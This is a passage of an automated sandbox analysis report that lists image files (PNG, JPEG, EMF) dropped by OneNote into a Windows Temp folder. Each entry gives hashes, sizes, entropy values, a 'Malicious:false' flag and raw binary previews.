                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                  C:\Users\user\AppData\Local\Temp\{F3FC263F-7735-4F40-A281-3D567B4ED2CC}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):17289
                                                                                                  Entropy (8bit):7.962998633267186
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                  MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                  SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                  SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                  SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                  C:\Users\user\AppData\Local\Temp\{F56A2176-2CC0-4E91-865A-E6E78222FD95}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):12824
                                                                                                  Entropy (8bit):7.974776104184905
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
                                                                                                  MD5:2628353534C5AD86CBFE57B6616D46DD
                                                                                                  SHA1:244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
                                                                                                  SHA-256:69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
                                                                                                  SHA-512:2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}*f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F*.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.|. ......EC..............1.\

                                                                                                  C:\Users\user\AppData\Local\Temp\{F6F2085E-CEA4-4E62-8DE2-276B78097D84}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:12:29], progressive, precision 8, 598x766, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):70028
                                                                                                  Entropy (8bit):7.742089280742944
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:ub4bgbB7g9cKCmSzaNF0jAdAzQKTEFBQqUp/i0yG1pidLHTVX:ub4bIB7Qg2OjbzjgWp/i0yGCZx
                                                                                                  MD5:EC7811912ACA47F6AEB912469761D70D
                                                                                                  SHA1:C759BC2D908705D599B03BDB366C951B11F99A4E
                                                                                                  SHA-256:FBB4573E3BEE1B337077691BEBAE15D6FAC52432405D31396D526D7694A8283D
                                                                                                  SHA-512:881828150993A8C56E36CDA2051D89C1F6E0322643902C9506392C163E8734A2933A46486F40E5BC8C8D0164E180605E52620EF22FE14540AEA787A38B22E98E
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H.....7Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:12:29.............................V.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................}.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....H.yM..? .Z.. .^.x..p.8.A...K.... .\{..)..y....t..=.^y)..v.@.W>. .h.. ..p.:.\)(.$....$.I).....!....E..Z.....&.5.).

                                                                                                  C:\Users\user\AppData\Local\Temp\{F7C80B4C-81C3-47AC-884A-0F8919BD727B}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):16003
                                                                                                  Entropy (8bit):7.959532793770661
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                  MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                  SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                  SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                  SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                  C:\Users\user\AppData\Local\Temp\{F827F945-7E19-4FD0-B2C9-F704C4545DCE}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):40884
                                                                                                  Entropy (8bit):7.545929039957292
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
                                                                                                  MD5:7379775A1E2AB7FAB95CFFCE01AE05F3
                                                                                                  SHA1:3D3DDFD8AC7E07203561BAE423D66F0806833AB3
                                                                                                  SHA-256:9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
                                                                                                  SHA-512:4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v

                                                                                                  C:\Users\user\AppData\Local\Temp\{F872AB7B-A587-461D-AB73-8483DA1796C7}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4847
                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                  C:\Users\user\AppData\Local\Temp\{F979E05F-1C40-4BF1-A082-1783644C3992}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19235
                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                  C:\Users\user\AppData\Local\Temp\{FA6276DF-A13E-42C7-8778-AD82145E316E}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                  Category:dropped
                                                                                                  Size (bytes):32656
                                                                                                  Entropy (8bit):3.9517299510231485
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
                                                                                                  MD5:DD4CA4BC0A73FCB71BEBAA3C29CB8F66
                                                                                                  SHA1:1A7085771D7941540EC94A1BD24D7CC8EA556D4B
                                                                                                  SHA-256:0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
                                                                                                  SHA-512:5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
                                                                                                  Malicious:false
                                                                                                  Preview:....l...r...1...*...^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+*@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+*@..$..........?...........?.........@.......................}*E

                                                                                                  C:\Users\user\AppData\Local\Temp\{FA7FE51E-7AC7-42D4-ABB4-4AFBFB67CCD9}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 50 x 556, 8-bit colormap, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):977
                                                                                                  Entropy (8bit):7.231269197132181
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:6v/7QiFJaY/z+obuqFA4fypjQSbtBK+lcqNGSbb7XTJArRRzN5DjNRkPmu5cCbR2:x0QY7xbjy9pY0JPXLTWroeuCCbX0
                                                                                                  MD5:B7F74C18002A81A578A4EE60C407A8D3
                                                                                                  SHA1:70A7D4BB1B3ADF4397D168AD0D81B286F88EBDE0
                                                                                                  SHA-256:95F59A0433050180D4C0E8858B83363D51BEA6752A8B7CA516A8677854D8F5B6
                                                                                                  SHA-512:13186A7CDCE80BCA9D2238666D6D7A989FA1887EABFA5D8A9A63EEC304DFD4BE8EFF652205FA56E1D1CEE7D3680AF8C70A952AF73AB3C246400E8D4EBECBDBA9
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...2...,........A....PLTE...................................................................................................................................................................................$.y.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^...0.D_.......cck.....%a...X.a0Y...-..!.G...[....(.r.H.$...1 .zq.4V.e|a.6.X..4..kl.%....=w....6..TN.....{.4..T/.z...../.....3..!~..t.#b..^.....E!.SFb ...-.....^...,..C.!.b...i._c...s.X.w.. lsQH..H.gKc@@...i. ....m...;Ci....@G.; V{..lO..\.R9e$..{.....P...E.+.2.0D.B,..P...56.?......K.6..TN....^z.4..T/.z...../.....3..!~..t.]b........E!.SFb ...-.....^...,..C.!.b...i._c..Y.O...?.9k2.M.?5 .n.P...,...d._..%M?....6....,.1..R.4.a.R.+..U.Q..P...vd..T........j .]@....."..lJ../.90.4...Y. ...9.%...{......Hc%.....i..%M?aG..H....o.q.......4.......X.d9.r..CI.O.5.Ri0?.s\b....w...>/k..4V.)Y....P...vd..T........j .]@....."..lJ../.90..2..MP..l..?....K.X.....IEND.B`.

                                                                                                  C:\Users\user\AppData\Local\Temp\{FB6CABB9-AE24-4B1B-A8E5-51CD98AD3C0A}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):7374
                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                  C:\Users\user\AppData\Local\Temp\{FB9B6D35-7B85-48F1-A43A-43CBFF7AC372}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3679
                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                  C:\Users\user\AppData\Local\Temp\{FD0E615A-3BB8-4EE9-9860-80C2B05BED86}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:15:20], progressive, precision 8, 604x784, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):140755
                                                                                                  Entropy (8bit):7.9013245181576695
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:i/aDiblRsFcOco8dofE5Zx1+NQI8Wh9aiOe5NTO:mnbM+TxaAi98W3aiOwTO
                                                                                                  MD5:CC087700C07D674D69AFDFDA0FA9825C
                                                                                                  SHA1:F11113DF69DACDB255C6CBCFB29C1D1CCE40B346
                                                                                                  SHA-256:A7FA7F092EFF43030A56342C39A765F8D5CC48C7DB815DDFC8C1E5EC40117FAE
                                                                                                  SHA-512:843202D975EFA91E73287052A893584B6E5AE601F91612B56539AA2F73D1AD3F997FCAD1E711E0F483A2E91D46D9643D0B026B43F4E94116A5D2FB6551536034
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:15:20.............................\.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.......J...\O.,......../$..........OE.m.o......T....Z..l.g.-....m.?...Y....3......"....].j.X.k.S.k.....4..R....{....?F.

                                                                                                  C:\Users\user\AppData\Local\Temp\{FE2E8586-95AD-46EB-8863-449987E656FF}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13241
                                                                                                  Entropy (8bit):7.931391290415517
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                  MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                  SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                  SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                  SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                  Malicious:false
